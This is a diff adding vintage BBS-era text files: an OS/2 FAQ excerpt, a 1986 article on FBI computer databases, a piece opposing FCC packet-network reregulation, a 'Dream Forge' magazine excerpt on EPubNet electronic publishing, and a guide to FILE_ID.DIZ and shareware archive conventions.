have installed the optional bitmaps, try clicking on the +Workplace Shell desktop background once with mouse button one and +pressing CTRL-ALT-SHIFT-O. + +If you have a color monitor, try editing your CONFIG.SYS file so that + SET PROMPT=$e[32;40m$e[1m[$P]$e[0m +to obtain a more colorful OS/2 command line prompt. You can do the same +for your DOS sessions if you edit PROMPT in AUTOEXEC.BAT, assuming you +have ANSI.SYS loaded. + +To force DIR to display your directories in alphabetical order, with the +subdirectories listed first, edit CONFIG.SYS so that + SET DIRCMD=/O:GN +and, if you wish the same for your DOS command line sessions, use DOSKEY +in AUTOEXEC.BAT (see the online Command Reference). DOSKEY also enables +command history. (Shutdown and reboot for changes to CONFIG.SYS to take +effect.) + +-- +Timothy F. Sipples Keeper of the OS/2 Frequently Asked Questions +sip1@ellis.uchicago.edu List, available via anonymous ftp from +Dept. of Economics 128.123.35.151, directory pub/os2/faq, or via +Univ. of Chicago 60637 netmail from LISTSERV@BLEKUL11.BITNET. + + \ No newline at end of file diff --git a/textfiles.com/computers/fbi.sys b/textfiles.com/computers/fbi.sys new file mode 100644 index 00000000..2d2e9065 --- /dev/null +++ b/textfiles.com/computers/fbi.sys @@ -0,0 +1,91 @@ +>From the Illumi-Net BBS Decatur, GA +Conspiracy Theory Conference 404-377-1141 + +Summary of FBI Computer Systems + +By Ralph Harvey + + This article is reprinted from Full Disclosure. Copyright (c) 1986 +Capitol Information Association. All rights reserved. Permission is hereby +granted to reprint this article providing this message is included in its +entirety. Full Disclosure, Box 8275, Ann Arbor, Michigan 48107. $15/yr. + + The FBI maintains several computer systems. The most common of which is +call NCIC (National Crime Information Computer). NCIC maintains a database of +information about such things as stolen cars, stolen boats, missing persons, +wanted persons, arrest records. It provides quick access to these records by +State, Local and Federal law enforcement agencies. NCIC is directly linked +with the Treasury Department's TECS computer and many State computer systems. +According to William H. Webster, Director of the FBI: + +When a police officer stops a car and is uncertain about who he's going to +meet when he gets out, he can plug into this system [NCIC] and in a matter of +a few seconds he can find out whether that person is a fugitive or the +automobile is stolen. Incidentally, we receive almost 400,000 inquires of +this nature each day in the NCIC system. + + When an agency determines that a subject is a fugitive, it supplies the FBI +computer with as much of the following information as possible: 1) Name and +case number; 2) Alias; 3) Race; 4) Sex; 5) Height; 6) Weight; 7) Color of +hair; 8) Color of eyes; 9) Description of any identifying scars, marks and +tattoos; 10) Date of birth; 11) Place of birth; 12) Social Security Number; +13) Passport Number; 14) Last known address; 15) Nationality; 16) If a +naturalized U.S. Citizen, date, place, and certificate number; 17) +Occupation; 18) The criminal violation with which subject is charged; 19) +Date of warrant; 21) Type of warrant -- Bench, Magistrate, etc.; 22) Agency +holding warrant; 23) Any information as to whether the subject is considered +dangerous, is known to own or currently possess firearms, has suicidal +tendencies, or has previously escaped custody; 24) Driver's license number, +year of expiration and State issued; 25) License number of vehicle, aircraft +or vessel subject owns or is known to use, include the year and State; 26) +Description of vehicle, aircraft or vessel subject owns or is known to use; +27) Associates of the subject*1; 28) FBI number; 29) Name and telephone of +the person to contact when subject is apprehended. + + One of the major problems with the system is that the agency that submits an +entry is responsible for keeping it up to date. Once an entry has been made, +there is little motivation for the originating agency to ``waste'' its time +keeping it up to date, so many entries become incorrect with the passage of +time. + + Another FBI computer system is their Investigative Support Information +System (ISIS). This system is only used to provide support for major +investigations that require the handling of a large volume of complex +information. It is limited to handling a maximum of 20 cases at a time. + + The ISIS system was used during the investigation of the murder of Federal +Judge John Wood in San Antonio, Texas. In this case, the FBI entered 300,000 +pieces of information, including 6,000 interviews, hotel registration +information from every hotel in the area, etc. The accused, while on trial, +claimed he was several hundred miles away. The FBI cross referenced his name +& known alias with the hotel registration database and got a match. Contact +with the hotel employees resulted in a positive identification and conviction +of the subject. + + The FBI has a system called the Organized Crime Information Systems (OCIS) +of which director William Webster is ``particularly proud.'' The system was +started in 1980 in Detroit, Michigan and is one of their most sophisticated +computers. The system is now functions in over 40 locations. + + The OCIS system allows agents in different field offices to share and +analyze information collected in each other's areas. This system was used to +identify some of the United States citizens who were released from Cuban +prisons in 1984 that had criminal histories in the United States. An OCIS +link was recently opened in Rome, where it's used to support drug +investigations. + + The OCIS system was used in the major Sicilian mafia heroin investigation, +commonly referred to as ``The Pizza Connection.'' According to Webster, +``OCIS support ranged from direct assistance in collating information for +Title III court-authorized wiretaps to the analysis of the case for grand +jury presentation.'' + + Currently under development is the Field Office Information Management +System (FOIMS). The purpose of this system is to fully automate the +administrative and record keeping functions of the field and resident offices. + +*1 One of the basic freedoms in this country is the First Amendment right to +freedom of association. The Privacy Act was enacted to stop government +invasions of privacy, and includes a provision specifically prohibiting the +collection of information on the exercise of First Amendment activities. + diff --git a/textfiles.com/computers/fcc.txt b/textfiles.com/computers/fcc.txt new file mode 100644 index 00000000..4c7ca406 --- /dev/null +++ b/textfiles.com/computers/fcc.txt @@ -0,0 +1,215 @@ +The following is a text file that was downloaded from the Delphi online +service's Tandy SIG + +The FCC is considering reregulating the packet-switching networks like Telenet, +Tymnet, Compuserve, The Source and PC Pursuit. This could result in additional +costs to the user. This is excerpted from Infomat magazine. + ==================================== + COMPUTER AND SOFTWARE NEWS -- PART 1 + ==================================== + by Tim Elmer + ------------------------------------ + FREE LOCAL ACCESS TO PACKET + SWITCHING NETWORKS MAY BE ELIMINATED + ------------------------------------ + (BPS) -- The Federal Communications Commission (FCC) will vote on a proposal +to reregulate packet switching networks that, if approved, would eliminate free +local telephone access to those networks. + "If this occurs, it might eventually double or triple the costs to those using +packet switching networks to access commercial on-line databases and +information services and triple or quadruple the costs to those using Telenet's +PC Pursuit," said Philip M. Walker, vice president and regulatory counsel for +Telenet Communications Corp. + + Predictably, the initiative to reregulate packet switching networks comes +primarily from the Bell Operating Companies (BOCs) and secondarily from AT&T. +These companies provide local telephone service to vast majority of telephone +customers throughout the U.S. and will benefit the most from FCC reregulation +of the packet switching networks. + + Under current FCC rules formulated in 1980 in the FCC's Second Computer +Inquiry, called Computer II, a distinction is made between "basic services" and +"enhanced services." "Basic services" are those that don't offer protocol +conversion such as local and long-distance voice telephone services. "Enhanced +services" are defined in an open-ended fashion as computer-based services that +are more than a "basic service," in other words, services such as packet +switching networks, database and on-line type services, and remote computing +services that offer protocol conversion, according to Walker. + + Under the 1980 Computer II Inquiry, the FCC ruled that "basic services" would +continue to be regulated as they had always been. However, the FCC also ruled +that "enhanced services" would be deregulated, which opened up the industry to +competition. This resulted in numerous companies entering the packet switching +business, including BOCs, AT&T and at least a dozen others. The competition +resulted in significant price reductions for packet switching services. + To prevent monopolization of the packet switching industry by the Big Boys +(the BOCs and AT&T), the FCC ruled that they had to keep separate accounting +figures for their "basic services" and for their "enhanced services," and that +they could not use revenues from their lucrative "basic services" to cross- +subsidize their "enhanced service" packet switching networks. + The FCC also ruled that if the BOCs and AT&T used their "basic service" +telephone lines for packet switching services, then they must let their +competitors have access to those lines on the same basis, which would preserve +true competition in the industry. + + "Now, under the FCC's Computer Inquiry III, the FCC is asking, should we +redefine protocol conversion services as 'basic services' rather than enhanced +services? Should we redefine all those companies as common carriers? This +would, in effect, subject them not only to federal regulations but, even worse, +to state regulations," Walker said. + The result would eliminate comparable interconnection requirements currently +imposed on BOCs and AT&T, allowing them to charge their packet switching +competitors local dial-in fees to access packet switching long-distance line +networks. It would also allow BOCs and AT&T to offer their own packet switching +services on a non-compensatory basis and, finally, allow them to cross- +subsidize those services with revenues from their much more lucrative voice +telephone service revenues. In short, it would allow BOCs and AT&T to +monopolize the packet switching industry and probably drive out most +competitors. + "In terms of cost impact," Walker said, "if we had to pay local access +charges, it would cost us about $3.60 an hour at the originating end, for calls +made by users to on-line databases and information services like CompuServe and +The Source. + + "And with PC Pursuit, for which we have out-dial modems, we would have to pay +not only 3.60 per hour access fees at the originating end but also $4.80 at the +terminating end, a total of about $8 or $9. Obviously, to survive, we would +have to add those additional charges to our current fees and pass them on to +our consumers," Walker said. + That would almost certainly spell the end of PC Pursuit, and it would likely +put out of business not only many independent packet switching networks but +also many on-line databases and information services. + + FCC approval of changes being considered in Computer III, Walker said, "would +really have a major impact on anyone using a packet switching service to access +online bulletin boards, databases, or information services aimed at the +residential user. They are just going to get creamed if this happens." + Walker said that is was not clear exactly when the FCC would vote on the +proposal, but that it would probably be the latter part of January or early +part of February, 1987. "They are moving very fast on this," he said. + For additional information, be sure to read Alan Bechtold's editorial in this +issue. + + ==========END>>> + + Copyright (C) 1986, by BBS PRESS SERVICE, INC. + + ================= + THE EDITOR SPEAKS + ================= + "Low-Cost packet switching Service Threatened" + + by Alan R. Bechtold + + As described in our lead news story this issue, the FCC is now considering a +major change in the way packet switched phone services are defined. This +change +is likely to lead to the demise of many of these services, and to much higher +prices for the use of the few that will eventually remain in business. + + At the risk of over-simplification, I think I should first describe just what +a packet switched networking service is. These are the services you use to +access online databases and commercial online services, such as CompuServe and +The Source, with just a local telephone call. Once you call the local Telenet +or Tymnet number, for example, and a connection is made, you are then connected +with a computer that puts you in communication with the online services with +which you wish to communicate. + + This computer is handling a number of calls into the main system computer at +the same time. It takes information you send and delivers it in "packets" to +the proper destination, picks up information from the online service computer +you called, and sends it, also in "packets," back to you. All of this +communicating is done in these so-called "packets" because this allows the +network's computers to offer protocol conversion and handle several ongoing +communications sessions at the same time. + + FCC regulations allow AT&T and Bell Operating Companies (BOCs) to engage in +packet switching network operations, but they must also maintain completely +separate accounting of their voice and packet switching operations. They must +also offer free local-calling access to their lines to any competitors engaged +in the packet switching service industry. + + The above regulations have allowed Telenet and Tymnet, among others, to +operate at a reasonable cost in a competitive atmosphere. This is a case of +regulation of a business actually RESULTING in increased competition and lower +prices to consumers. + + As things stand now, you can call any local Telenet or Tymnet access number +and use these services to inexpensively access such online services as +CompuServe, The Source, Delphi, and countless others. In addition, GTE's new +PC PURSUIT service now offers you access, through their Telenet packet +switching service, to literally hundreds of local bulletin boards in cities all +across the country--for a flat charge of $25 per month. + But, the FCC is now being asked to REREGULATE this segment of the +communications industry, eliminating the FCC requirements that AT&T and BOCs +keep separate accounting records of their voice and packet switching services, +and eliminating the stipulation that the BOCs and AT&T must offer their +competitors in the packet switching business free access to their local +telephone connection lines. + + The idea is patently ridiculous. + + Mark Fowler, Chairman of the FCC, has been hailed by the press as a "fair- +market zealot." The chances are very good that he views this proposed +reregulation as the magic road to increased competition and fairer pricing for +consumers. + Unofficially, the word is out that the FCC advisory committee now considering +this matter is indeed leaning in favor of the proposed reregulation of the +packet switching industry. If the committee recommends these changes, it's +likely that a majority of the five voting members on the Federal Communications +Commission will vote in favor of the changes. + + I have talked to sources within the industry who say it is the BOCs who are +pushing VERY HARD for this reregulation, because they want to get into the +packet switching service business in a big way, and they would like to rid +themselves of needless competition on their way to success. + + What's that? RID themselves of competition? But--the proposed reregulation +is supposed to FOSTER competition! Why would a group of companies (BOCs) +hoping to eliminate their competition PUSH for this reregulation? I hope the +answer to THAT question is entirely clear. + Here we have an industry that is currently populated with plenty of +competition. Prices are already reasonable. Reregulation of the packet +switching service industry will IMMEDIATELY give giant corporations the upper +hand, and will allow them to cut off free access to their local access phone +lines to their competitors, namely Telenet and Tymnet and other similar +services that now offer you high-quality service, in a competitive marketplace, +at reasonable prices. + + The proposed reregulation, however, would force all packet switching services +to compete with the BOCs and AT&T, companies that would be able to use the +enormous profits they earn with their voice telephone services to cross- +subsidize their packet switching services and offer them on a non-compensatory +basis, at least until their competitors are eliminated. When that happens, +they are then sure to jack up their fees to any level they want. + + It would also force their packet switching competitors to pay access fees for +connection to local phone lines. The access fees alone could add as much as +$4.00 per hour to the fees packet switching companies would be forced to pass +on to their customers. This will be added to your hourly connect-time charges +for accessing ALL online databases through these services. + The proposed reregulation could very well spell the death of PC PURSUIT. +Because GTE also uses dial-out modems at the other end of their Telenet +connections for PC PURSUIT service, the company would be forced to pay an +hourly charge at BOTH ends of the phone line--totaling up to $8 or $9 per +hour. These fees would have to be added to the flat $25 per month that GTE now +charges for access to PC-PURSUIT. It would simply make the final cost to PC- +PURSUIT customers too high for the service to remain practical and affordable. + So--this is ONE TIME you MUST use your word processor to produce some letters +opposing this proposed reregulation! Write to: + + Honorable Mark Fowler + Chairman of the Federal Communications Commission + Washington D.C. 20554 + + Refer to Computer Inquiry III in your letters. State clearly, in your own +words, that competitive packet switching services should not be reregulated or +subjected to carrier access charges, and then explain why not. Tell Mr. Fowler +that reregulation of packet switching services will completely destroy the +existing fair market for these services, and eventually increase costs, not +DECREASE them. + + And hurry! I have heard this matter will be going before the FCC for a vote +in the latter part of January or early part of February. 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The Multimedia CD's are + quite impressive, if done well. I received the Microsoft ENCARTA CD + as part of the promotional bundle with my system. + + The video and voice clips are quite interesting and there is quite + a variety, from little bits of history shown to the sounds of dogs + barking. The quality of the sound depends on your system, but I was + driving my dog nuts, as she attempted to find the other dog in the + house. If you don't have a CD, I feel you are missing one of the + better resources available with a computer. Ensure the one you get + is the double speed or better and complies with the multimedia + standards. Then get on a good CD supplier's mailing list. A little + tip here: some of the bundles available are a little disappointing. + + ==================================================================== + + -=-=-=-=-= + MORE STUFF + =-=-=-=-=- + + If you are reading the magazine, perhaps the following may be + of interest to you: + + + INTRODUCTION TO ELECTRONIC PUBLISHING + +Copyright 1995 EPubNet + +These days, word-processing and desktop publishing software gives +writers and publishers enormous power in formatting documents for +publication. Unfortunately, this power is often thrown away before +the reader gets to the document, by printing it onto paper. Paper +lacks the flexibility and power of a computer processor. Electronic +Publishing lets publishers retain the capabilities of the computer +for the use of the reader, by creating a document that is designed +to be distributed and read entirely on computer. + +This is done in a number of ways. A text may be created in universal +ASCII format, which is readable by numerous text readers, word +processors, and even with the DOS "type" command. Fidonews, the +newsletter for the 29,000+ Fidonet BBS systems internationally, is a +perfect example of this type of electronic publishing. A good text +reader program allows the user to quickly scan the document for a +certain word or phrase, page through it, and more. + +A more powerful form of electronic publishing uses Hypertext. +Hypertext is a type of program which uses specially formatted +documents - the reader uses a "Reader Program" to view the document, +"jumping" between locations within a document using predefined +"links". For instance, an electronic textbook on the government might +contain a paragraph which refers to the US Congress. Rather than +including a note (see page 456), as a paper textbook would, the +electronic version would have the word "Congress" highlighted. +Clicking on the word would instantly take the reader to the part +of the book which explains Congress in more detail. + +Alternately, the "Congress" link could pop up a small note which +gives a quick explanation of the topic, a diagram of the organization +of the two Houses, or even a VGA graphic showing the Capitol building +in full color. This method allows a writer to put basic and advanced +information out of sight, to be called only by those readers who are +interested in them. This allows a text to be informative and +interesting to readers with varying levels of knowledge - beginners +aren't confused by complex details, and experts aren't forced to wade +through basic explanations. + +Electronic Periodicals are growing in popularity. By publishing +electronically, the costs of typesetting, printing and shipping are +eliminated. Publications can be distributed quickly and cheaply over +phone lines, making them much more timely than print publications. +EPubNet (see other bulletins) aids in this distribution greatly by +offering a network of BBS's to pass publications along without +charge. Currently there are many Electronic Periodicals in the form +of magazines and newsletters. There are also many books available. + +Electronic Publishing has enormous potential for the future. Many +companies are already using the tools for training and marketing +purposes, as well as documentation and help systems for software. +As the concepts become more familiar, and software and hardware +becomes more common, the electronic format will become a major +supplement to the print format. Consumers will find it much more +convenient and inexpensive to have their favorite magazines +uploaded directly to their home computer within hours of publication +than waiting for the US Mail to bring it around to their mailbox. + +The opportunity exists now to get involved in the ground level of a +breaking new industry. Take it! + +*********************************************************************** + +FOR SYSOPS + +EPubNet maintains an open invitation to sysops interested in +joining EPubNet, and tries to accommodate as many different +operating platforms and networking formats as possible. The core +of EPubNet is PC Compatible Fidonet systems, but the net is open +to gating messages and files to other network types, with permission. + +REQUIREMENTS TO JOIN +There is no official application process for EPubNet. Below are the +requirements: + +(1) Establish a link from an eligible hub + This merely means contacting a current member of the net who is + able to feed other systems, and asking to take the message + and/or file areas from them. The HUBS.EPN file contains a list + of EPubNet nodes willing to provide feeds. The Filebone is an + alternative you may want to consider (see next section). + +(2) Minimum Polling + You must poll your feed at least once a week, more often if your + hub requires it (to prevent unsent mail from taking up too much + disk space). + +(3) System Information + At the end of this file the system information needed to list + your BBS in the membership directory is listed. Once you have + established a feed, please post this information in the EP-SYSOP + echo. + +(4) Required Message Areas + All systems which receive EPubNet message or file areas should + carry the EP-SYSOP message area, to keep in contact with the + network. + + +FILE DISTRIBUTION + +If you want to participate in file distribution, you just need +to ask your hub to set you up to receive them. Usually you can turn +them on and off as you like with RAID compatible requests, which work +like Areafix requests. A variety of programs are available to let you +process these files. Popular programs include TICK and ALLFIX. The +Fidonet FILE_ECHO backbone echo is a good place to find out about +these programs. + + +FILEBONE + +The Filebone is a system within Fidonet which distributes message +and file areas for a large number of file distribution networks, +such as ANSINet (ANSI art), PDN (Programmer's Distribution Network), +and WinNet (For Windows programs). + +National Hubs for the Filebone are listed in the FILEBONE.NA file, +along with the different file nets and file areas. You can get +EPubNet file and message areas from any of these hubs, along with +file and message areas from other file networks. If you are only +interested in the EPubNet areas you'll probably be better off linking +in through an EPubNet hub, since you'll get things quicker. But if +you're interested in getting other areas in addition to EPubNet, the +Filebone is a good bet. + + +EPUBNET LEADERSHIP + +If you have a problem getting linked into EPubNet, or have other +questions, the following are the leadership folks you can contact: + + Network Coordinator / FileBone Liaison: + Dave Bealer (1:261/1129) (V.34) + (410) 437-3463 + + Distribution Coordinator: + N.L. Hargrove (1:301/1) (V.32 node) + (1:301/301) (V.32bis node) + (505) 865-4082 + + +SYSTEM INFO + +Please post this info in the EP-SYSOP echo once you have gotten your +feed setup. This lets us know who all is hooked up, and get to know +each other. + + System Name: + Sysop Name: + City: + State/Province: + Country: + BBS Line Phone Numbers: + Minimum Speed: The minimum speed you allow callers to connect at + Modem Speeds: + For each protocol type, maximum connect rate available: + v.etc 9600 or 14.4k + HST 9600, 14.4k or 16.8k + Zyxel 16.8k or 19.2k + + Are you getting all of the message areas? + Are you getting the file areas? + What electronic publishing activities have you been involved in + in the past? + What electronic publishing activities are you interested in? +===================================================================== + =-=-=-=-=-=- + Announcement! + -=-=-=-=-=-= + + DREAM FORGE BBS - for You: + ************************** + DREAM FORGE BBS: will be providing Internet email, USENET + newsgroups on a WildCat 2-line system. Subscribers to DREAM FORGE + BBS will also receive an individual subscription to DREAM FORGE + magazine. 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SHARE them, + send to: whatnots@dreamforge.com or Fido: 1:2601/522 to Sysop. + ==================================================================== + + As always, seek competent advice from your legal advisor, doctor, + maid, dentist, accountant, beautician, lawyer, bartender, neighbor, + AA, AAA, AAAA, dog, NWU, military advisor, coroner, mechanic, mother, + father (both for totally different answers), gardener, tax advisor, + HARLEY DEALER, travel agent, roofer, computer dealer (ha), insurance + salesperson, and don't forget the butcher, baker, and candle maker! + Talk to your kids for the best advice! + Any and all information found in this magazine is taken entirely at + the risk of the individual, and as always wear a condom for complete + protection -- against misinformation, and other things. Any and all + similarity to real people is purely fictional coincidence, especially + the editors, who are figments of our collective consciousness. + ==============================={DREAM}============================== + diff --git a/textfiles.com/computers/fileid.txt b/textfiles.com/computers/fileid.txt new file mode 100644 index 00000000..a64d8591 --- /dev/null +++ b/textfiles.com/computers/fileid.txt @@ -0,0 +1,373 @@ +FILEID.TXT v1.9 by Richard Holler [CIS 73567,1547] +Last Revision 05/17/94 + +This text file was prepared at the request of the ASP (Association of +Shareware Professionals), but the information contained in it may be of +value to any shareware author. + + +FILE_ID.DIZ INFORMATION +----------------------- +Basically, the FILE_ID.DIZ file is a straight ASCII text file, distributed +inside your distribution archive file along with your program files, which +contains a description of your program. This file will be used by most BBS +(Bulletin Board System) softwares for the online file description of your +file. We recommend that the FILE_ID.DIZ file be used in all of your +distribution archives. + +This text file contains a description of the FILE_ID.DIZ file, as well as a +description of the recommended distribution archive format. + + +WHY SHOULD YOU USE FILE_ID.DIZ? +------------------------------- +The use of this file will insure that the online description of your +program will be in your own words (and who better to describe your program +than yourself?), and that it will remain the same no matter how many +different people upload your file to various BBS systems. + +As more and more BBS software makes use of this file, you can be assured +that your own description will replace such online descriptions as "Cool +Program" or "OK utility, but needs better ..." + +Please note that the ASP Hub Network, the Author Direct FDN (File +Distribution Network), and the majority of other electronic distribution +services *REQUIRE* that a valid FILE_ID.DIZ file be contained in your +submitted distribution archive. If your file doesn't contain a valid +FILE_ID.DIZ file, then it simply won't be distributed by these services. +Furthermore, most BBS sysops will not accept uploads of files which do not +contain a valid FILE_ID.DIZ file, so you automatically lose out on that +distribution as well. + + +DESCRIPTION: +------------ +FILE_ID.DIZ was created by Clark Development for use with their PCBDescribe +utility, as a means for shareware authors to provide descriptions for their +products, and thus so that BBS callers can upload the file(s) without +having to manually type in a file description. + +As long as an author creates and includes a FILE_ID.DIZ file in their +distribution fileset, the text from that file will be used for the online +description (in most cases) rather than anything typed in by the uploader. +It also ensures that the online description is always the same regardless +of the number of different BBS systems the file is posted on. It has since +been accepted by the BBS industry more-or-less as the "standard" file +description source. (The extension of "DIZ" actually stands for +"Description In Zip"). + +NOTE: The FILE_ID.DIZ file *MUST* be named exactly that, and *NOT* +something like .DIZ. It will *ONLY* be used if it is named +FILE_ID.DIZ! + +The FILE_ID.DIZ file is nothing more than a straight ASCII text file which +contains the full description of the archived file containing it. It is +used by most popular BBS software to describe your program, rather than +using the description supplied by the person that uploaded your file. It +should be placed *INSIDE* your distribution archive file. The FILE_ID.DIZ +file is defined by its creators (Clark Development) as being created by the +program author, and *NOT* the end user who is trying to upload the program. + +The BBS software will "look" inside the archive file. If a FILE_ID.DIZ file +is found, it will replace any existing online file description with the +text contained in FILE_ID.DIZ. It is an excellent method for making sure +that your program files are described the way that "you" want them +described. Even sysops who's software can't automatically make use of the +FILE_ID.DIZ file have found it to be an excellent source for their manually +added file descriptions. + + +STRUCTURE: +---------- +The file consists of straight ASCII text, up to 10 lines of text, each line +being no more than 45 characters long. It should *NOT* contain any blank +lines, any form of centering or formatting, or any Hi-ASCII or ANSI +characters. (i.e. it should ONLY contain alpha & numeric characters). + +We recommended that it consist of 5 basic parts: + + 1. the proper name of your program + 2. the version number + 3. the "ASP" identifier (optional, for ASP members) + 4. the description separator + 4. the description + +All of the above parts should be separated by a single "space". + +PROGRAM NAME: To set it apart from the rest, it is recommended that you use +ALL CAPS for the program name. + +VERSION NUMBER: The version number should be in the form of "v12.34". + +ASP IDENTIFIER: If you are an ASP author, we recommend that an "" +identifying mark be added after the version number, to identify your +product as an ASP-authored product. + +DESCRIPTION SEPARATOR: To separate the actual description text, insert a +simple "-" (dash/minus) character after the ASP identifier (or version +number, if not using the ASP identifier), and in front of the description +text. + +DESCRIPTION: You should attempt to FULLY describe your product, including +its most important functions and features. Be sure to include anything +which will separate your program from it's competition, and make the BBS +user want to download your file. Also try to include any hardware or +software requirements that your product may have. + +You should try to use the first 2 lines of the text to give a basic +description of your program. This is helpful for sysops who's BBS software +limits them to less than 10 lines, 45 characters. Sysops who are limited to +using shorter descriptions can simply use the 1st two lines and truncate +the rest. Thus, you can basically still supply your own description for BBS +software which does not actually utilize the FILE_ID.DIZ feature. + +The remaining lines of text can be used to elaborate on the programs +features, enhancements from the prior version, information concerning +multi-file sets. Please note that older versions of some BBS software can +only use 8 lines of text. It is advisable that you create your FILE_ID.DIZ +file so that the file can be truncated to various line lengths without +destroying it's usefulness. + + +EXAMPLE +------- +MY PROGRAM v1.23 - A program which will +do anything for anybody. Will run in only 2k +of memory. Can be run from the command line, +or installed as a TSR. Completely menu- +driven. Version 1.23 reduces the previous 4k +memory requirements, and adds an enhanced +graphical user interface. Also, MY PROGRAM +now contains Windows and DESQview support. +Coming soon - an OS/2 version. +From Do-It-All Software, Inc. $15.00 + + +MULTIPLE DISK INFO +------------------ +Please note that if your distribution archive requires multiple archive +files, you should create a separate, specific FILE_ID.DIZ file for each +archive. This can be utilized to describe the various contents of each +archive, and to identify each disk in the set. For example, the FILE_ID.DIZ +file for disk #1 could contain: + + "MY PROGRAM v1.23 Program Executable + Files - Disk 1 of 2" + [followed by detailed description text] + +while the FILE_ID.DIZ file for disk #2 could contain: + + "MY PROGRAM v1.23 Documentation Files - + Disk 2 of 2" + [followed by more detailed description text] + +Optionally, you could also create a "complete" FILE_ID.DIZ file for the +first disk, which would fully describe the program in detail, and identify +it as Disk 1 of x. Then, for each remaining file in the set, simply include +the Program Name, version number, ASP identifier, and the disk number (i.e. +"MY PROGRAM v1.23 Disk 2 of x"). + + +ADDITIONAL INFO +--------------- +Please don't be tempted to use fancy graphic or ANSI sequences in the +FILE_ID.DIZ file, as most BBS software will not allow this, and will render +your FILE_ID.DIZ file useless. Also, don't be tempted to simply copy your +program description file to FILE_ID.DIZ. Attempting to "format" your +FILE_ID.DIZ file (i.e line centering, right & left justification, etc) will +also cause unexpected results, especially for BBS software which re-formats +descriptions to other than 10line/45char. + +Fred Hill has written a freeware utility which interactively creates +a valid FILE_ID.DIZ file. The file is called DIZGEN.ZIP, and is included +with this distribution archive. I highly recommend that you use this +utility for creating your FILE_ID.DIZ files. + +<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*> + +The following is a recommendation for the structure and contents of +distribution archives prepared for use on BBS systems. + + +DISTRIBUTION DISK RECOMMENDATIONS +--------------------------------- +The following are recommendations for preparing your program files for +distribution to Bulletin Board Systems (BBSs) via the ASP's distribution +services, as well as other methods. + +Two varieties of program files are defined here: + +1) Program files which utilize an "install" utility and self-extracting +program archives (later referred to as "Author-Installed Programs"). + +2) Programs files which do not use install utilities or self-extracting +archives (later referred to as "User-Installed Programs"). + + +AUTHOR-INSTALLED PROGRAMS: +-------------------------- +These programs require a bit more work from the author, but will eliminate +many user mistakes, especially in programs which require complicated +setups. + +Most "installation" utility programs will make use of program files which +have been "archived" into Self-Extracting (SFX) archives. We will attempt +to define which files should be contained in the Self-Extracting archives, +and which files should not. + +1. Files which should be contained in the self-extracting program file +archive: + + a. All program-specific executable files. + b. Any required configuration and/or data files required by the + program. + c. Program documentation files. Optionally, these may be left + outside of the self-extracting archive, in order to allow + them to be viewed/read by the various archive viewing utlities. + d. Any other program-specific files that are required for the + operation of the program. + +2. The files described above should be compiled into a self-extracting +archive file, which will then be extracted by the install utility. + +NOTE: the author is required to abide by any distribution requirements +specified by the archive utility author, and to obtain any required +distribution rights necessary. Please check to see if distribution rights +are required for your archive utility choice. + +3. Files which should NOT be contained in the self-extracting program file +archive: + + a. The install utility itself (obviously). + b. The FILE_ID.DIZ file. (described in detail in the section + preceding this one) + c. Any distribution/information files, such as VENDOR.TXT, + SYSOP.TXT, etc. + d. Any description or information file, such as DESCRIBE.TXT. + e. A user file (such as README.1ST), which should explain how + to use the install utility, what the user should expect + during the installation, and any preparation that the user + should make prior to the installation. This file might also + contain a brief description of your program, in case the user + is able to read the documentation files in the distribution + archive prior to downloading (many BBS systems offer this + ability to the user). + +4. The actual distribution archive file (described below) should then +contain the install utility, the self-extracting program archive, and the +files described in #3 above. + + +USER-INSTALLED PROGRAMS: +------------------------ +This type of distribution archive is much simpler than the Author-Installed +variety. It should simply be an archive file, containing all of the files +for the program described above. + +Since this type of program requires the user to do all of the installation +manually, it should contain very specific and detailed information +regarding the installation requirements (such as INSTALL.TXT). + + +THE DISTRIBUTION ARCHIVE FILE: +------------------------------ +The actual distribution archive file should merely be an archive file +containing the files described above. For BBS distribution, this archive +should be of the standard archive format, and -NOT- a self-extracting +archive. Many sysops will not allow self-extracting archives, and most BBS +software will not allow self-extracting archives to be uploaded. + +There are many popular archive utilities available, such as PKZIP, LHA, +LHARC, ARJ, etc. Most BBS systems are capable of handling archives in +virtually any format. However, you should be aware that most BBS systems +will convert your archive format to the format of choice by the sysop. By +following the methods described above, this conversion process should not +affect your program, or any self-extracting files which are contained +within your distribution archive file. + +You should also retain the default archive file extension defined by the +archive utility. For example, PKZIP uses a ".ZIP", LHARC uses "LZH", etc. +Changing the file extension may cause the BBS software to delete your file +because it doesn't recognize the format. + +For the actual filename for your distribution archive, it is recommended +that the program filename be limited to 6 characters to represent the +program's name (i.e. MYPROG could represent "My Program"). This should be +followed by 2 numeric digits which will represent the version number of +your release. Even if this is your initial release it should include the +version number in the filename (i.e. MYPROG10.ZIP would indicate the +program called "My Program" version 1.0). + +Please note that CompuServe limits filenames to only 6 characters. By +limiting the file "name" to 6 characters, you will easily be able to rename +the archive for CompuServe uploading by simply removing the 2-digit version +identifier, to make the file compatible with CompuServe libraries. + +By including the 2-digit version number in the archive filename, it will be +very easy for both the user and the sysop (and yourself) to identify older +versions of your program. + + +MULTIPLE DISTRIBUTION ARCHIVES +------------------------------ +At one time, it was recommended that your final distribution archive not be +larger than 350k, so that it would fit on a single 360k floppy disk and +still leave room for any distribution files necessary for Disk Vendors. +(i.e. Disk Vendors will often include their own GO.BAT file, or other +various small files to help their customers install the software). This +limitation is slowly falling by the wayside as more and more computer +systems have 3.5" floppy disk drives as standard. + +If your program is large enough to require more than one distribution +archive, it is recommended that your filename be limited to 5 characters +rather than 6 as described above. Following the 5-character name should be +the same 2-digit version number. Then, append a single "letter" to identify +the disk (i.e. MYPGM10A.ZIP, MYPGM10B.ZIP, etc.). For uploading to +CompuServe, these filenames may then be shortened to 6 characters by +removing the version identifiers (i.e. MYPGMA.ZIP, MYPGMB.ZIP). However, +for CompuServe it is recommended that you simply create a single +distibution file, and eliminate the multi-part file set. + +If your program requires multiple distribution archives, -BE SURE- to +create separate FILE_ID.DIZ files for each distribution archive. Also, each +FILE_ID.DIZ file should contain disk number information pertaining to each +individual archive (i.e. Disk 1 of 3, Disk 2 of 3, etc.). + + +THE DISTRIBUTION DISK +--------------------- +It is recommended that your distribution disk simply contain a ZIPd version +of your product. However, If you choose to supply "unarchived" files on a +distribution disk for Disk Vendor use, it is _VERY_ important that you +specify in your documentation a suggested archive filename, so that BBS +sysops can create archived files with the proper author-specified +filenames. This information should be contained in your SYSOP.TXT (or +VENDOR.TXT) file. If you don't supply a suggested archive file name, the +sysops will be forced to create the name themselves, thus you may end up +with thousands of versions 